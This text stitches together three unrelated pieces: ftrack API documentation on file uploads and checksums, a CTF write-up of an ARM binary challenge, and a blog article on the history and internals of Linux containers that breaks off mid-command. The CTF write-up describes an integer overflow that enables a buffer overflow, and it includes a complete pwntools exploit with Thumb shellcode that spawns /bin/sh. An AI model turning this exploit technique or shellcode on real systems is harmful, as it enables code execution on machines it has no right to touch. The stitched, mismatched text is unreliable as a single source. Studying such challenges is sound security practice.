Uploading and downloading of components in the ftrack.server location is handled separately from the rest of the API. Uploading files Uploading files is done in three steps. - A signed PUT URL is fetched from the server. - The returned URL and headers is used to upload the file. - The upload is finished by adding the component to the ftrack.server location. Obtaining PUT Metadata Issue an Get upload metadata operation to retrieve the PUT metadata to use. Uploading the file Example call using CURL: curl -X PUT \ --header "Content-Type: image/jpeg" \ --header "Content-Disposition: attachment; filename=\"image.png\"" \ --upload-file image.png \ The response may vary depending on which media server is used, but you can assume that a HTTP response of 200 indicates that the upload was successful. Finalizing the upload After the file has been uploaded, it should be marked as present in the ftrack server location. This can be done with a call to the API endpoint, creating a ComponentLocation. It can now also be used for various other operations such as adding it to a version, encode it to a reviewable format or adding as a thumbnail. Example request body: [ { "action": "create", "entity_type": "ComponentLocation", "entity_data": { "location_id": "3a372bde-05bc-11e4-8908-20c9d081909b", "component_id": } } ] Computing the checksum The checksum is used as the Content-MD5 header and should contain the base64-encoded 128-bit MD5 digest of the message (without the headers) according to RFC 1864. This can be used as a message integrity check to verify that the data is the same data that was originally sent. Although it is optional, we recommend using the checksum mechanism as an end-to-end integrity check. For reference, this is the implementation in the python client. def _compute_checksum(fp): '''Return checksum for file.''' buf_size = 8192 hash_obj = hashlib.md5() spos = fp.tell() s = fp.read(buf_size) while s: hash_obj.update(s) s = fp.read(buf_size) base64_digest = base64.encodestring(hash_obj.digest()) if base64_digest[-1] == '\n': base64_digest = base64_digest[0:-1] fp.seek(spos) return base64_digest
http://help.ftrack.com/en/articles/1040508-data-transfer
CC-MAIN-2019-35
refinedweb
334
51.34
. Arm Exploitation According to my test on raspberry pi, the stack and heap are not executable as below: So exploit only works if the binary not enforced with ASLR and DEP, i.e., the challenge environment. For debugging this challenge, I recommend reading [1] first. Vulnerability Analysis There is a very important data structure as below: struct vector { u8 id; u8 len; u8 vec_buf[len]; } Same as the note in [3], there is a buffer with variable length in the data structure. This is not a standard C syntax. The final payload looks like below: {id1, len1, [ vec_buf1 ]}, {id2, len2, [ vec_buf2 ]} , {id3, len3, [ vec_buf3 ]} Pre-Processing There is a global_context variable at 0x2205c, which will be used heavily later. In function 0x11028, different function pointers will be invoked according to the id. Next I will introduce the fun0, fun2, fun6 and fun8 involved in the exploit. fun0(char *input_buffer, u8 &curLength, char *global_context) // at 0x10919 { u8 cur = *curLength; if(input_buffer[0] != "\x00") { //code to update curLength return 0; } else { u8 vec_length = (u8)input_buffer[cur + 1]; if(vec_length == 2) { char ch1 = vec_buf[0]; char ch2 = vec_buf[1]; global_context[4] = ch1 + ch2; *curLength = *curLength + 4; global_context[0] |= 1; } } } fun2 is a little bit complicated. To pass the final validity check in the end, we have to somehow execute the following code: if(val <= (bufLen + 2) * 8) { update curLength; global_context[0] |= 4; return 0; } The purpose of fun6 is confusing to me. The functionality of this function is given below: fun6(char *input_buffer, u8 &curLength, char *global_context) // at 0x10da0 { if(global_context[0] & 0x40 != 0) { //update curLength; return 0; } if(cur_vec->bufLen == 1) { global_context[2] = ((cur_vec->vec_buf[0])>>2); global_context[0] |= 0x40; update curLength; return 0; } } According to my final text, fun6 seems to have no effect on the final exploit. But I do not understand why [3] and [4] both take this function into consideration. fun8 takes the copies the vector buffer into the global_context. fun6(char *input_buffer, u8 &curLength, char *global_context) // at 0x10f59 { if(global_context[0] & 0x80 != 0) { //update curLength; return 0; } if(cur_vec->bufLen == 0) { //some code return 1; } else { void *dst = global_context + 0x68; copy(dst, 0x100, cur_vec->vec_buf, cur_vec->len); *(global_context+0x64) = cur_vec->len; global_context[0] |= 0x80; //update curLength; return 0; } } Vulnerability Digging Then we come the critical part of this challenge. Function 0x11200 is the key function in this exploit. The pseudo code in [3] is well written enough. So I will not take space to write about the whole pseudocode here. In fun8, a payload is copied into global_context, which is also of the following pattern: {id1, len1, [ vec_buf1 ]}, {id2, len2, [ vec_buf2 ]} , {id3, len3, [ vec_buf3 ]} This time, those vectors will be sorted according to the vector id. The algorithm of identifying each vector is given below: curLength = 0; while(curLength < *(global_context+0x64)) { //local_input is a copy of payload in vector 8 recordVecByID(local_input, &curLength, array+3*( *(local_input + curLength))); } void recordVecByID(local_input, u8 *curLength, BYTE *dstAddress) { length = *curLength; dstAddress[0] = * ( (BYTE*)(local_input + length) ); //vec id dstAddress[1] = * ( (BYTE*)(local_input + length + 1) ); //vec length dstAddress[2] = v3; //current total length *curLength = *curLength + dstAddress[1] + 2; } At first glance, it seems that there is no problem about this code. But actually there exists an integer overflow vulnerability in this code. Type of curLength is u8 and vector length is under attacker’s control, which means that we may create overlapping vectors during exploitation. Then we come to the sorting part of this challenge. curLength = 0; for(i=0; i<=19; i++) { if(ID i exists) { vecLen = *(array+i*3+1); copy(global_context+0x68, vecLen+2, local_context + *(array+i*3+2), vecLen+2); } } As noted above, the problem still comes from the vecLen come from user input. It is easy to trigger a buffer overflow here. But the annoying part of this challenge is that we have to trigger the buffer overflow 101 times. In the first 100 times, the destination address is a global address. In the 101th time, the destination address is a stack address. Exploitation Plan From the pseudo code above, we can find that the vec->len could be some large value and make the value of total length less than previous round, our target is to make the payload stay unchanged after each round. I think the example in [3] has explained clearly enough. I will just describe them briefly here. For a normal process in sub_11200: {0, 0}, {15, 3, 0xd0, 15, 15}, {2, 3, 2, 2, 2}, {1, 4, 1, 1, 1, 1} After the sorting algorithm, the sorted vector will be: {0, 0}, {15, 3, 0xd0, 15, 15}, {1, 4, 1, 1, 1, 1}, {2, 3, 2, 2, 2} For a malicious process in sub_11200 {0, 0}, {15, 5, 0xd0, 15, 15, 3, 4}, {2, 3, 2, 2, 2}, {1, 0xf7, 1, 1} The parsing process on the vectors will be: Total bytes 0: {0, 0} Total bytes 2 (0+2): {15, 5, 0xd0, 15, 15, 3, 4} Total bytes 9 (2+5+2): {2, 3, 2, 2, 2} Total bytes 14 (9+3+2): {1, 0xff, 1, 1} with extra 0xfd padding 0’s Total bytes 7 (14 + 0xf7 + 2): {3, 4, 2, 3, 2, 2} The overlapping vector The copying sequence from the local buffer to the target address will be arranged according to the vector id, i.e., {0, 15, 1, 2, 3} At this point, we can get a rough exploitation plan for this challenge. (1) Use the vector of id 1 to create overlapping vector (id 3) (2) Use the vector of id 2 to trigger buffer overflow vulnerability (3) Use the overlapping vector to restore the payload to its original state. Exploit The final exploit is also given on my github repo.[5] from pwn import * import pwnlib DEBUG = int(sys.argv[1]); if(DEBUG == 1): env = {"LD_PRELOAD":"./libc.so.6"}; r = process(["qemu-arm-static", "./ld-linux-armhf.so.3", "./balong"], env=env); elif(DEBUG == 2): env = {"LD_PRELOAD":"./libc.so.6"}; r = process(["qemu-arm-static", "-g", "12345", "./ld-linux-armhf.so.3","./balong"], env=env); raw_input("Debug"); context.arch = "thumb" shellcode = ""; shellcode += asm('eors r2, r2'); shellcode += asm('add r0, pc, 8'); shellcode += asm('push {r0, r2}'); shellcode += asm('mov r1, sp'); shellcode += asm('movs r7, 11'); shellcode += asm('svc 1'); def makeVector(vecid, length, vec): ans = ""; ans = p8(vecid) + p8(length) + vec; return ans; def fun0(): vector = p8(2) + p8(4); return makeVector(0, 2, vector); def fun2(): binaryBuf = "00" + "00000011" + "1111" + "1101" + "0101" + "00"; vector = translate(binaryBuf); return makeVector(2, 3, vector); def translate(buf): length = len(buf); ans = ''; for i in range(0, length/8): tmpBuf = buf[8*i: 8*i + 8]; val = int(tmpBuf, 2); ans += chr(val); return ans; def fun6(): return makeVector(6, 1, "\x01"); def fun8(): buf = ""; buf += p8(0) + p8(3) + "\x10\x00\x40"; x = 39; y = 44; buf += p8(15) + p8(x); tmpbuf = "\xd0" + shellcode + "/bin/sh\x00"; tmpbuf = tmpbuf.ljust(x-2, 'A'); tmpbuf += p8(3) + p8(y+4); buf += tmpbuf; buf += p8(2) + p8(y) + p32(0x220cd)* (y/4); buf += p8(1) + p8(0xfa-y) log.info("Buf length: %d" % len(buf)); return makeVector(8, len(buf), buf); def exploit(): payload = "\x00"; payload += fun0(); payload += fun2(); #payload += fun6(); payload += fun8(); r.send(payload); r.interactive(); exploit(); Conclusion At this point, I still do not know what’s the point of fun6. Even if I comment out the fun6 function in my exploit, the exploit seems to work still. Maybe I need some time to take a deeper look in the code. More information about this challenge could be found in [6]. Reference [1] [2] [3] [4] [5] [6]
https://dangokyo.me/2018/09/22/0ctf2018-qual-mightydragon-pwn-write-up/
CC-MAIN-2020-05
refinedweb
1,273
57.71
and so, there is a library mouseit has mouse.double_click (button= 'left') but it doesn't work on ubuntu, that is, I run the python file with sudo, but it doesn't click import mouse as ms import keyboard as k from time import sleep while True: if ms.is_pressed (button= 'left') and not k.is_pressed ("shift"): clicked= 0 while True: sleep (0.01) ms.double_click (button= "left") clicked += 1 print (f "{w} ckicked!") if not ms.is_pressed (button= 'left'): break well, I did import mouse as ms @ EnikeyschikКзлч Вв2021-11-25 06:50:20 in plan, if the left button is pressed, then he clicks, if released, he does not clickКзлч Вв2021-11-25 06:50:58 But how can you click if the button is held down?Эникейщик2021-11-25 06:53:45 I'll try to remove itКзлч Вв2021-11-25 06:55 if ms.is_pressed (button= 'left') ?????Эникейщик2021-11-25 06:48:56
https://www.tutorialfor.com/questions-382114.htm
CC-MAIN-2021-49
refinedweb
157
91
for connected embedded systems SignalAction(), SignalAction_r() Examine and/or specify actions for signals Synopsis: #include <sys/neutrino.h> int SignalAction( pid_t pid, void ( * sigstub)(), int signo, const struct sigaction * act, struct sigaction * oact ); int SignalAction_r( pid_t pid, void * (sigstub)(), int signo, const struct sigaction * act, struct sigaction * o:. POSIX signals The signals are defined in <signal.h>, and so are these global variables: - char * const sys_siglist[] - An array of signal names. - int sys_nsig - The number of entries in the sys_siglist array. There are 32 POSIX 1003.1a signals, including: - SIGHUP - Hangup. - SIGINT - Interrupt. - SIGQUIT - Quit. - SIGILL - Illegal instruction (not reset when caught). - SIGTRAP - Trace trap (not reset when caught). - SIGIOT - IOT instruction. - SIGABRT - Used by abort(). - SIGEMT - EMT instruction. - - Continue a stopped process. - SIGTTIN - Attempted background tty read. - SIGTTOU - Attempted background tty write. There are 16 POSIX 1003.1b realtime signals, including: - SIGRTMIN - First realtime signal. - SIGRTMAX - Last realtime signal. The entire range of signals goes from _SIGMIN (1) to _SIGMAX (64). Signal actions If act isn't NULL, then the specified signal is modified. If oact isn't NULL, the previous action is stored in the structure it points to. You can use various combinations of act and oact to query or set (or both) the action for a signal. The structure sigaction contains the following members: -. The sa_handler and sa_sigaction members of act are implemented as a union, and share common storage. They differ only in their prototype, with sa_handler being used for POSIX 1003.1a signals, and sa_sigaction being used for POSIX 1003.1b queued realtime signals. The values stored using either name can be one of: - function - The address of a signal-catching function. See below for details. - SIG_DFL - Use the default action for the signal: - SIGCHLD, SIGIO, SIGURG, and SIGWINCH -- ignore the signal (SIG_IGN). - SIGSTOP -- stop the process. - SIGCONT -- continue the program. - All other signals -- kill the process. - SIG_IGN - Ignore the signal. Setting SIG_IGN for a signal that's pending discards all pending signals, whether it's blocked or not. New signals are discarded. If your process ignores SIGCHLD, its children won't enter the zombie state and the process can't use wait() or waitpid() to wait on their deaths.). When you specify a handler, you must provide the address of a signal stub handler for sigstub. This is a small piece of code in the user's space that interfaces the user's signal handler to the kernel. The library provides a standard one, __signalstub(). QNX) messages queues generated the signal. - union sigval si_value - A value associated with the signal, provided by the generator of ThreadCreate(). Blocking states These calls don't block. Returns: The only difference between these functions is the way they indicate errors: - SignalAction() - If an error occurs, -1 is returned and errno is set. Any other value returned indicates success. - SignalAction_r() - EOK is returned on success. This function does NOT set errno. If an error occurs, any value in the Errors section may be returned. process doesn't have permission to change the signal actions of the specified process. - ESRCH - The process indicated by pid doesn't exist. Classification: See also: abort(), ChannelCreate(), kill(), longjmp(), siglongjmp(), signal(), sigaction(), SignalKill(), SignalProcmask(), sigqueue(), sigsetjmp(), SyncMutexLock(), ThreadCreate(), wait(), waitpid()
http://www.qnx.com/developers/docs/6.4.0/neutrino/lib_ref/s/signalaction.html
crawl-003
refinedweb
537
61.22
Opened 7 years ago Closed 7 years ago #14532 closed (wontfix) django.views.generic.list_detail.object_list behavior with callables in extra_context Description When using django.views.generic.list_detail.object_list, if it is called with an extra_context parameter that contains an entry with a callable, that callable will be called when copying the extra context to the actual context. This behavior is not always wanted. In my application, the extra_context contains an object instance in which the class have a custom call method. Since my call method have some required parameters, I will get an error when trying to display the page using the view. The callable should only be called if it is a function. If the user of object_list wants a callable object in the extra_context, then the user should call the object instance when adding the object to the context dictionary. I changed the code in django/views/generic/list_detail.py on line 93 to 96 to: import types if isinstance(value, types.FunctionType): c[key] = value() else: c[key] = value Function-based generic views have been deprecated in favor of class-based generic views. Complications with the interpretations of extra_context are one (of many) reasons for this.
https://code.djangoproject.com/ticket/14532
CC-MAIN-2017-34
refinedweb
200
56.05
Using the Get-WMiObject Cmdlet Retrieving Data Using WMI. For example, suppose you need information from the Win32_BIOS class. OK: You get the idea: just call Get-WmiObject followed by the class name. Ah, you say, but what if that class is located on a remote computer? No problem; just add the -computername parameter followed by - you guessed it - the name of the remote computer (atl-fs-01): Still not convinced? Good point: we did say that, by default, Get-WmiObject connects to the root\cimv2 namespace. Is there any way to connect to a class found in a different namespace? Of course there is: just include the -namespace parameter followed by the complete namespace path (e.g., root\ccm, not just ccm). For example, this command returns information from the SMS_Client class, which resides in the root\ccm namespace: It should go without saying that you can use other cmdlets in conjunction with Get-WmiObject (although we seem to have said it anyway). For example, this command retrieves information from the CCM_InstalledComponent class on the remote computer atl-fs-01. The command then pipes that data to Select-Object, which filters out all properties except three: DisplayName, Name, and Version. In turn, that filtered data is passed to Sort-Object, which sorts the information by DisplayName. Here’s what the command looks like: And here’s the kind of data you get back: displayname name version ----------- ---- ------- CCM Framework CcmFramework 2.50.4160.2000 CCM Policy Agent CcmPolicyAgent 2.50.4160.2000 CCM Status Agent CcmStatusAgent 2.50.4160.2000 SMS Client Core Components SmsClient 2.50.4160.2000 SMS Inventory Agent SmsInventory 2.50.4160.2000 SMS Remote Control Agent SmsRemoteTools 2.50.4160.2000 SMS Shared Components SmsCommon 2.50.4160.2000 SMS Software Distributi... SmsSoftwareDistribution 2.50.4160.2000 SMS Software Metering A... SmsSoftwareMetering 2.50.4160.2000 SMS Software Update Agent SmsSoftwareUpdate 2.50.4160.2000 SMS Source List Update ... SmsSourceUpdateAgent 2.50.4160.2000 On the other hand, there will likely be times when you don’t want a filtered set of properties and their values; instead, you’d just like to see everything Win32_BIOS has to offer. To ensure that you get back information on all the properties (and their values) your best bet is to pipe the data returned by Get-WmiObject to Select-Object, then use the wildcard character * to indicate that you want back all the property values: If you don’t want all the system properties (like __SUPERCLASS and __RELPATH) then add the -excludeproperty parameter and use the wildcard character to filter out any properties whose name begins with an underscore character: Bonus tip. WMI itself is actually pretty easy to use; what isn’t always so easy is figuring out the properties and methods for a specific WMI class. Check that: that’s what used to be difficult. With Windows PowerShell you can simply use Get-WmiObject to connect to the class in question (for example, Win32_BIOS), and then pipe that information through the Get-Member cmdlet: And what will that do for you? That will show you the properties and methods of Win32_BIOS, including: Etc.
https://technet.microsoft.com/en-us/library/ee176860.aspx
CC-MAIN-2015-32
refinedweb
527
64.1
DAC_Init_TypeDef Struct Reference DAC initialization structure, common for both channels. #include <em_dac.h> DAC initialization structure, common for both channels. Field Documentation ◆ refresh Refresh interval. Only used if REFREN bit set for a DAC channel. ◆ reference Reference voltage to use. ◆ outMode Output mode. ◆ convMode Conversion mode. ◆ prescale Prescaler used to get DAC clock. Derived as follows: DACclk=HFPERclk/(2^prescale). The DAC clock should be <= 1MHz. ◆ lpEnable Enable/disable use of low pass filter on output. ◆ ch0ResetPre Enable/disable reset of prescaler on ch0 start. ◆ outEnablePRS Enable/disable output enable control by CH1 PRS signal. ◆ sineEnable Enable/disable sine mode. ◆ diff Select if single ended or differential mode.
https://docs.silabs.com/gecko-platform/3.2/emlib/api/efm32wg/struct-d-a-c-init-type-def
CC-MAIN-2022-33
refinedweb
108
56.21
What is a container? A story about picking apart how and why containers work the way they do This post is written at and syndicated on Medium. Check out the original for a higher fidelity copy. Containers have recently become a common way of packaging, deploying and running software across a wide set of machines in all sorts of environments. With the initial release of Docker in March, 2013[1] containers have become ubiquitous in modern software deployment with 71% of Fortune 100 companies running it in some capacity[2]. Containers can be used for: - Running user facing, production software - Running a software development environment - Compiling software with its dependencies in a sandbox - Analysing the behaviour of software within a sandbox Like their namesake in the shipping industry containers are designed to easily “lift and shift” software to different environments and have that software execute in the same way across those environments. Containers have thus earned their place in the modern software development toolkit. However to understand how container technology fits into our modern software architecture its worth understanding how we arrived at containers, as well as how they work. In this article we’ll only be discussing Linux containers. There are container implementations on other operating systems but we do not feel qualified to discuss those just yet. Although there are containers implemented on other operating systems Linux containers are in common use in both MacOS and Windows. In both of those operating systems these are implemented by way of virtualized hardware — a virtual machine. History The “birth” of containers was denoted by Bryan Cantrill as March 18th, 1982[3] with the addition of the chroot syscall in BSD. From the FreeBSD website[4]: According to the SCCS logs, the chroot call was added by Bill Joy on March 18, 1982 approximately 1.5 years before 4.2BSD was released. That was well before we had ftp servers of any sort (ftp did not show up in the source tree until January 1983). My best guess as to its purpose was to allow Bill to chroot into the /4.2BSD build directory and build a system using only the files, include files, etc contained in that tree. That was the only use of chroot that I remember from the early days. — Dr. Marshall Kirk Mckusick chroot is used to put a process into a "changed root"; a new root filesystem that has limited or no access to the parent root filesystem. An extremely minimal chroot can be created on Linux as follows[5]: # Get a shell $ cd $(mktemp -d) $ mkdir bin $ $(which sh) bin/bash# Find shared libraries required for shell $ ldd bin/sh linux-vdso.so.1 (0x00007ffe69784000) /lib/x86_64-linux-gnu/libsnoopy.so (0x00007f6cc4c33000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6cc4a42000) libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f6cc4a21000) libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f6cc4a1c000) /lib64/ld-linux-x86-64.so.2 (0x00007f6cc4c66000)# Duplicate libraries into root $ mkdir -p lib64 lib/x86_64-linux-gnu $ cp /lib/x86_64-linux-gnu/libsnoopy.so \ /lib/x86_64-linux-gnu/libc.so.6 \ /lib/x86_64-linux-gnu/libpthread.so.0 \ /lib/x86_64-linux-gnu/libdl.so.2 \ lib/x86_64-linux-gnu/$ cp /lib64/ld-linux-x86-64.so.2 lib64/# Change into that root $ sudo chroot .# Test the chroot # ls /bin/bash: 1: ls: not found # There were problems with this early implementation of chroot, such as being able to exit that chroot by running cd..[3], but these were resolved in short order. Seeking to provide better security FreeBSD extended the chroot into the jail[3][4] which allowed running software that desired to run as root and running it within a confined environment that was root within that environment but not root elsewhere on the system. This work was further built upon in the Solaris operating system to provide fuller isolation from the host[3][6]: - User separation (similar to jail) - Filesystem separation (similar to chroot) - A separate process space Providing something similar to the modern concept of containers; processes running on the same kernel. Later, similar work took place in the Linux kernel to isolate kernel structures on a per-process basis under “namespaces”[7]. However, in parallel Amazon Web Services (AWS) launched their Elastic Compute Cloud (EC2) product which took a different approach to separating out workloads: virtualising the entire hardware[3]. This has some different tradeoffs; it limits exploitation of the host kernel or isolation implementation however running the additional operating system and hypervisor meant a far less efficient use of resources. Virtualisation continued to dominate workload isolation until the company “dotcloud” (now Docker), then operating as a “platform as a service” (PAAS) offering, open sourced the software they used to run their PAAS. With that software and a large amount of luck containers proliferated rapidly until Docker became the power house it is now. Shortly after Docker released their container runtime they started expanding their product offerings into build, orchestration and server management tooling[8]. Unhappy with this CoreOS created their own container runtime, rkt, which had the stated goal of interoperating with existing services such as systemd, following the unix philosophy of "Write programs that do one thing and do it well[9]." To reconcile these disaparate definitions of a container the Open Container Initiative was established[10], after which Docker donated its schema and its runtime as what amounted to a defacto container standard. There are now a number of container implementations, as well as a number of standards to define their behaviour. Definition It might be surprising to learn that a “container” is not a real thing — rather, it is a specification. At the time of writing this specification has implementations on^[11]: - Linux - Windows - Solaris - Virtual Machines In turn, containers are expected to be[12]: - Consumable with a set of standard, interoperable tools - Consistent regardless of what type of software is being run - Agnostic to the underlying infrastructure the container is being run on - Designed in a way that makes automation easy - Of excellent quality There are specifications that dictate how containers should reach these principles by defining how they should be executed (the runtime specification[11]), what a container should contain (the image specification[13]) and how to distribute container “images” (the distribution specification[14]). These specifications mean that a wide variety of tools can be used to interact with containers. The canonical tool that is in most common use is the Docker tool, which in addition to manipulating containers provides container build tooling and some limited orchestration of containers. However, there are a number of container runtimes: As well as other tools that help with building or distributing images. Lastly, there are extensions to the existing standards, such as the container networking interface, which define additional behaviour where the standards are not yet clear enough. Implementation While the standards give us some idea as to what a container is and how they should work, it’s perhaps useful to understand how a container implementation works. Not all container runtimes are implemented in this way; notably, kata containers implement hardware virtualisation as alluded to earlier with EC2. The problems being solved by containers are: - Isolation of a process(es) - Distribution of that process(es) - Connecting that process(es) to other machines With that said let’s dive in to the Docker implementation[15]. This uses a series of technologies exposed by the underlying kernel: Kernel feature isolation: namespaces The man namespaces command defines namespaces as follows:. Paraphrased, a namespace is a slice of the system that, from within that slice, a process cannot see the rest of the system. A process must make a system call to the Linux kernel to changes its namespace. There are several system calls: clone: Create a new process. When used in conjunction with CLONE_NEW*it creates a namespace of the kind specified. For example, if used with CLONE_NEWPIDthe process will enter a new pidnamespace and become pid 1 setns: Allows the calling process to join an existing namespace, specified under /proc/[pid]/ns unshare: Moves the calling process into a new namespace There is a user command also called unshare which allows us to experiment with namespaces. We can put ourselves into a separate process and network namespace with the following command: # Scratch space $ cd $(mktemp -d)# Fork is required to spawn new processes, and proc is mounted to give accurate process information $ sudo unshare \ --fork \ --pid \ --mount-proc \ --net# Here we see that we only have access to the loopback interface root@sw-20160616-01:/tmp/tmp.XBESuNMJJS# ip addr 1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00# Here we see that we can only see the first process (bash) and our `ps aux` invocation root@sw-20160616-01:/tmp/tmp.XBESuNMJJS# ps aux USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.3 0.0 8304 5092 pts/7 S 05:48 0:00 -bash root 5 0.0 0.0 10888 3248 pts/7 R+ 05:49 0:00 ps aux Docker uses the following namespaces to limit the ability for a process running in the container to see resources outside that container: -). These provide reasonable separation between processes such that workloads should not be able to interfere with each other. However there is a notable caveat: we can disable some of this isolation[16]. This is an extremely useful property. One example of this would be for system daemons that need access to the host network to bind ports on the host[17], such as running a DNS service or service proxy in a container. Process #1 or the init process in Linux systems has some additional responsibilities. When processes terminate in Linux they are not automatically cleaned up, but rather simply enter a terminated state. It is the responsibility of the init process to "reap" those processes, deleting them so that their process ID can be reused[18]. Accordingly the first process run in a Linux namespace should be an init process, and not a user facing process like mysql. This is known as the zombie reaping problem. Another place namespaces are used is the Chromium browser[19]. Chromium uses at least the setuid and usernamespaces. Resource isolation: control groups The kernel documentation for cgroups defines the cgroup as follows: Control Groups provide a mechanism for aggregating/partitioning sets of tasks, and all their future children, into hierarchical groups with specialized behaviour. That doesn’t really tell us much though. Luckily it expands:/cgroup-v1/cpusets.txt) allow you to associate a set of CPUs and a set of memory nodes with the tasks in each cgroup. So, cgroups are a groups of "jobs" that other systems can assign meaning to. The systems that currently use this cgroup systems: As well as various others. cgroups are manipulated by reading and writing to the /proc filesystem. For example: # Create a cgroup called "me" $ mkdir /sys/fs/cgroup/memory/me# Allocate the cgroup a max of 100Mb memory $ echo '100000000' | sudo tee /sys/fs/cgroup/memory/me/memory.limit_in_bytes# Move this proess into the cgroup $ echo $$ | sudo tee /sys/fs/cgroup/memory/me/cgroup.procs 5924 That’s it! This process should now be limited to 100Mb total usage Docker uses the same functionality in its --memory and --cpus arguments, and it is employed by the orchestration systems Kubernetes and Apache Mesos to determine where to schedule workloads. Although cgroups are most commonly associated with containers they’re already used for other workloads. The best example is perhaps systemd, which automatically puts all services into a cgroup if the CPU scheduler is enabled in the kernel[20]. systemd services are … kind of containers! Userland isolation: seccomp While both namespaces and cgroups go a significant way to isolating processes into their own containers Docker goes further than that to restrict what access the process can have to the Linux kernel itself. This is enforced in supported operating systems via "SECure COMPuting with filters", also known as seccomp-bpf or simply seccomp. The Linux kernel user space API guide defines seccomp as: Seccomp filtering provides a means for a process to specify a filter for incoming system calls. The filter is expressed as a Berkeley Packet Filter (BPF) program, as with socket filters, except that the data operated on is related to the system call being made: system call number and the system call arguments. BPF in turn is a small, in-kernel virtual machine language used in a number of kernel tracing, networking and other tasks[21]. Whether the system supports seccomp can be determined by running the following command[22]: $ grep CONFIG_SECCOMP= /boot/config-$(uname -r)# Our system supports seccomp CONFIG_SECCOMP=y Practically this limits a processes ability to ask the kernel to do certain things. Any system call can be restricted, and docker allows the use of arbitrary seccomp “profiles” via its --security-opt argument[22]: docker run --rm \ -it \ --security-opt seccomp=/path/to/seccomp/profile.json \ hello-world However, most usefully Docker provides a default security profile that limits some of the more dangerous system calls that processes run from a container should never need to make, including: clone: The ability to clone new namespaces bpf: The ability to load and run bpfprograms add_key: The ability to access the kernel keyring kexec_load: The ability to load a new linux kernel As well as many others. The full list of syscalls blocked by default is available on the Docker website. In addition to seccomp there are other ways to ensure containers are behaving as expected, including: Each of which take slightly different approaches of ensuring the process is only executed within expected behaviour. It’s worth spending time to investigate the tradeoffs of each of these security decisions or simply delegating the choice to a competent third party provider. Additionally it’s worth noting that even though Docker defaults to enabling the seccomp policy, orchestration systems such as kubernetes may disable it[25]. Distribution: the union file system To generate a container Docker requires a set of “build instructions”. A trivial image could be: # Scratch space $ cd $(mktemp -d)# Create a docker file $ cat <<EOF > Dockerfile FROM debian:buster# Create a test directory RUN mkdir /test# Create a bunch of spam files RUN echo $(date) > /test/a RUN echo $(date) > /test/b RUN echo $(date) > /test/cEOF# Build the image $ docker build . Sending build context to Docker daemon 4.096kB Step 1/5 : FROM debian:buster ---> ebdc13caae1e Step 2/5 : RUN mkdir /test ---> Running in a9c0fa1a56c7 Removing intermediate container a9c0fa1a56c7 ---> 6837541a46a5 Step 3/5 : RUN echo Sat 30 Mar 18:05:24 CET 2019 > /test/a ---> Running in 8b61ca022296 Removing intermediate container 8b61ca022296 ---> 3ea076dcea98 Step 4/5 : RUN echo Sat 30 Mar 18:05:24 CET 2019 > /test/b ---> Running in 940d5bcaa715 Removing intermediate container 940d5bcaa715 ---> 07b2f7a4dff8 Step 5/5 : RUN echo Sat 30 Mar 18:05:24 CET 2019 > /test/c ---> Running in 251f5d00b55f Removing intermediate container 251f5d00b55f ---> 0122a70ad0a3 Successfully built 0122a70ad0a3 This creates a docker image with the id of 0122a70ad0a3 containing the contents of date at a, b and c. We can verify this by starting the container and examining its contents: $ docker run \ --rm=true \ -it \ 0122a70ad0a3 \ /bin/bash$ cd /test $ ls a b c $ cat *Sat 30 Mar 18:05:24 CET 2019 Sat 30 Mar 18:05:24 CET 2019 Sat 30 Mar 18:05:24 CET 2019 However, in the docker build command earlier Docker created several images. If we run the image after only a and b have been executed we will not see c: $ docker run \ --rm=true \ -it \ 07b2f7a4dff8 \ /bin/bash $ ls test a b Docker is not creating a whole new filesystem for each of these images. Instead, each of the images are layered on top of each other. If we query Docker we can see each of the layers that go into a given image: $ docker history 0122a70ad0a3 IMAGE CREATED CREATED BY SIZE COMMENT 0122a70ad0a3 5 minutes ago /bin/sh -c echo Sat 30 Mar 18:05:24 CET 2019… 29B 07b2f7a4dff8 5 minutes ago /bin/sh -c echo Sat 30 Mar 18:05:24 CET 2019… 29B 3ea076dcea98 5 minutes ago /bin/sh -c echo Sat 30 Mar 18:05:24 CET 2019… 29B 6837541a46a5 5 minutes ago /bin/sh -c mkdir /test 0B ebdc13caae1e 12 months ago /bin/sh -c #(nop) CMD ["bash"] 0B <missing> 12 months ago /bin/sh -c #(nop) ADD file:2219cecc89ed69975… 106MB This allows docker to reuse vast chunks of what it downloads. For example, given the image we built earlier we can see that it uses: - A layer called ADD file:…— this is the Debian Buster root filesystem at 106MB - A layer for athat renders the date to disk at 29B - A layer for bthat renders the date to disk at 29B And so on. Docker will reuse the Add file:… Debian Buster root for all image that start with FROM: debian:buster. This allows Docker to be extremely space efficient if possible, reusing the same operating system image for multiple different executions. Even though Docker is extremely space efficient the docker library on disk can grow extremely large and transferring large docker images over the network can become expensive. Therefore, try to reuse image layers where possible and prefer smaller operating systems or the scratch (nothing) image where possible. These layers are implemented via a Union Filesystem, or UnionFS. There are various “backends” or filesystems that can implement this approach: overlay2 devicemapper aufs Generally speaking the package manager on our machine will include the appropriate underlying filesystem driver; docker supports many: $ docker info | grep Storage Storage Driver: overlay2 We can replicate this implementation with our overlay mount fairly easily[26]: # scratch cd $(mktemp -d)# Create some layers $ mkdir \ lower \ upper \ workdir \ overlay# Create some files that represent the layers $ touch lower/i-am-the-lower $ touch higher/i-am-the-higher# Create the layered filesystem at overlay with lower, upper and workdir $ mount -t overlay \ -o lowerdir=lower,upperdir=upper,workdir=workdir \ ./overlay \ overlay# List the directory $ ls overlay/ i-am-the-lower i-am-the-upper Docker goes so far as to nest those layers until the multi-layered filesystem has been successfully implemented. Files that are written are written back to the upper directory, in the case of overlay2. However Docker will generally dispose of these temporary files when the container is removed. Generally speaking all software needs access to shared libraries found in static paths in Linux operating systems. Accordingly it is the convention to simply ship a stripped down version of an operating systems root file system such that users can install and applications can find the libraries they expect. However, it is possible to use an empty filesystem and a statically compiled binary with the scratch image type. Connectivity: networking As mentioned earlier, containers make use of Linux namespaces. Of particular interest when understanding container networking is the network namespace. This namespace gives the process separate: - (virtual) ethernet devices - routing tables iptablesrules For example, # Create a new network namespace $ sudo unshare --fork --net# List the ethernet devices with associated ip addresses $ ip addr 1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1000 link/loopback 